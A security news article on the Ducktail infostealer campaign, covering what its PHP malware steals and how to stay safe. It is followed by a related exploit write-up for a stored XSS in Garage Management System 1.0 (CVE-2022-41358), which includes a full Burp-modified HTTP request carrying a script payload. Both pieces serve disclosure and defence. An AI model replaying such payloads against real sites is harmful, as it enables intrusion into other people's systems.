A phishing campaign known to specifically target employees with access to their company's Facebook Business and Ads accounts has significantly widened its net and begun using a first-of-its-kind information-stealing malware to go after crypto wallets.

The Ducktail _(Woo-ooh!)_ campaign was first made public three months ago in July, but it's thought to have been active since 2018. The cybercriminal behind the campaign is thought to be from Vietnam.

**Ducktail 101**

Social engineering attacks and malware form the core of Ducktail's _modus operandi_. In previous campaigns, it used a .NET Core malware that specifically steals Facebook Business and Ads accounts and saved browser credentials. All stolen data was then exfiltrated to its command & control (C2) server, a private Telegram channel.

In this latest campaign, the cybercriminals replaced .NET Core with malware written in PHP. Not only does Ducktail continue to steal Facebook credentials and browser data, but it also steals cryptocurrency wallets, too. These are then stored on a command & control (C2) website in JSON (JavaScript Object Notation) format, wherein texts are easy to understand.

Note that Ducktail also broadened its target to include all Facebook users.

The attacker lures their target into downloading and installing a malicious installer (usually compressed in a ZIP file) by making them believe it's a video game, subtitle, adult video, or cracked MS application file (among others). This ZIP is hosted on popular file-sharing platforms.

Once the file is opened, the malware shows a fake "Checking Application Compatibility" pop-up to distract users while it installs in the background. The malware then executes two processes: The first is for establishing persistence on the affected system, meaning the malicious script is scheduled to run daily and regularly; The second is for data stealing tasks. 

Zscaler researchers broke down the kinds of data this PHP malware steals:

*   Browser information (machine ID, browser version, user profiles). In particular, this malicious script is after sensitive data stored in Chrome browsers. 
*   Information stored in browser cookies
*   Crypto account information from the _wallet.dat_ file
*   Data from various Facebook pages, such as API graph, Ads Manager, and Business, which are not limited to: 
    *   Accounts and their status
    *   Ads payment cycle
    *   Currency details
    *   Funding source
    *   Payment method
    *   PayPal payment method (email address tied to PayPal accounts)
    *   Verification status

Data stored on the C2 website is retrieved and used to conduct further information theft within the affected system. Additional stolen information is fed back to the C2 server.

**Stay safe from the Ducktail infostealer**

As Ducktail uses clever social engineering tactics as the precursor to infection and information theft, it is more important than ever for Facebook users, especially those responsible for their business's Facebook accounts, to be wary of this information stealer's risks. Prevention is key.

*   Never download files not relevant to your work, especially if you're using company-provided computers and mobile devices.
*   Be wary of downloading files from popular file-sharing sites. Malware is usually shared there, too.
*   If something seems too good to be true, it probably is. You'd be better off avoiding it.

If you suspect you've been infected by Ducktail malware and you're a Facebook Business administrator, check if any new users have been added to _Business Manager > Settings > People._ Revoke access to any unknown users with admin access.

Lastly, it is essential to have security software you can count on installed on your computer to protect against risky files that may still end up on the computer, regardless of one's vigilance. Remember that some malware campaigns don't need human intervention to infect systems. You have to watch out for those, too.

Stay safe!

**RELATED ARTICLES**

New PHP-based Ducktail infostealer is now after crypto wallets

A stored cross-site scripting (XSS) vulnerability in Garage Management System v1.0 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the categoriesName parameter in createCategories.php.

**Exploit Title: Garage Management System 1.0 - 'categoriesName' - Stored XSS****Exploit Author: Sam Wallace****Software Link: https://www.sourcecodester.com/php/15485/garage-management-system-using-phpmysql-source-code.html****Version: 1.0****Tested on: Debian****ID: CVE-2022-41358****Summary:**

Garage Management System utilizes client side validation to prevent XSS. Using burp, a request can be modified and replayed to the server bypassing this validation which creates an avenue for XSS.

**When messages suggest that validation is occuring this is a good point in time to validate that these checks are also being completed server side.**

**This is the request prior to any modifications in Burp.**

**Perform a quick modification in Burp...**

**Profit!**

**Proof**

**POC**

    Parameter: categoriesName
    URI: /garage/php_action/createCategories.php
    

    Host: 10.24.0.69
    Content-Length: 367
    Cache-Control: max-age=0
    Upgrade-Insecure-Requests: 1
    Origin: http://10.24.0.69
    Content-Type: multipart/form-data; boundary=----WebKitFormBoundaryqKDsN4gmatTEEkhS
    User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/105.0.5195.102 Safari/537.36
    Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.9
    Referer: http://10.24.0.69/garage/add-category.php
    Accept-Encoding: gzip, deflate
    Accept-Language: en-US,en;q=0.9
    Cookie: PHPSESSID=gbklvcv3vvv987636urv0gg53u
    Connection: close
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesName"
    
    <script>alert(1)</script>
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="categoriesStatus"
    
    1
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS
    Content-Disposition: form-data; name="create"
    
    
    ------WebKitFormBoundaryqKDsN4gmatTEEkhS--
    
    
    ![Alt text](/img/Intercept.png "Optional title")
    

**Reference:**

https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2022-41358

Tag

#php